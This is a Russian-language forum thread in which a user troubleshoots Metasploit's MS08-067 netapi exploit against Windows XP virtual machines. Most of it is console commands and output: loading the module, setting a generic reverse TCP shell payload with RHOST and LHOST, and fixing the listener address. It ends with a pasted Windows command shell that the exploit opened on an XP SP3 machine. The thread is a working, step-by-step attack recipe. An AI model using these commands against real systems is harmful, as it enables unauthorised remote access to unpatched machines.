Просмотр полной версии : Metasploit (Ubuntu) не могу найти MS08-067_netapi
Собрал из исходников метасплоит на убунте, ввожу в консоль (msfconsole) выбор эксплоита, но почему-то он не находится, в чём дело? Ведь он есть в /msf3/modules/exploits/windows/smb/
msf > use MS08-067_netapi
[-] Failed to load module: MS08-067_netapi
НОВЫЙ ВОПРОС НИЖЕ!
ты сам ответил на свой вопрос
use exploit/windows/smb/ms08_067_netapi
ты сам ответил на свой вопрос
use exploit/windows/smb/ms08_067_netapi
спасибо большое! а я пробовал полный путь указывать)
Новый вопрос:
Почему я не могу получить доступ к системе (поставил на вирт. машину голый Windows XP SP2 RU)? На ней нет никаких заплаток.
Started reverse handler on 127.0.0.1:4444
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 2 - lang:Russian
Selected Target: Windows XP SP2 Russian (NX)
Attempting to trigger the vulnerability...
Exploit completed, but no session was created.
До этого:
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 172.31.34.250
RHOST => 172.31.34.250
msf exploit(ms08_067_netapi) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
>> LHOST => 127.0.0.1
После пробива у тебя идет попытка соединения на локальный интерфейс.
Измени на ip адрес совей Ubunt'ы
>> LHOST => 127.0.0.1
После пробива у тебя идет попытка соединения на локальный интерфейс.
Измени на ip адрес совей Ubunt'ы
Спасибо, теперь получилось)
Только вот не могу понят, пробую атаковать голую без заплаток и с выключенным брандмауэром свою XP SP2 на виртуалке, выдаёт:
msf exploit(ms08_067_netapi) > exploit
Started reverse handler on 172.31.47.208:4444
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 2 - lang:Russian
Selected Target: Windows XP SP2 Russian (NX)
Attempting to trigger the vulnerability...
Exploit completed, but no session was created.
Атакую юзаемый Windows XP SP3 - атака проходит:
Started reverse handler on 172.31.47.208:4444
Automatically detecting the target...
Fingerprint: Windows XP Service Pack 3 - lang:Russian
Selected Target: Windows XP SP3 Russian (NX)
Attempting to trigger the vulnerability...
Command shell session 1 opened (172.31.47.208:4444 -> 172.31.47.196:2658) at Mon Jun 07 14:39:12 +0400 2010
Microsoft Windows XP [������ 5.1.2600]
(�) ��௮����� ����������, 1985-2001.
C:\WINDOWS\system32>
Почему так может быть?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot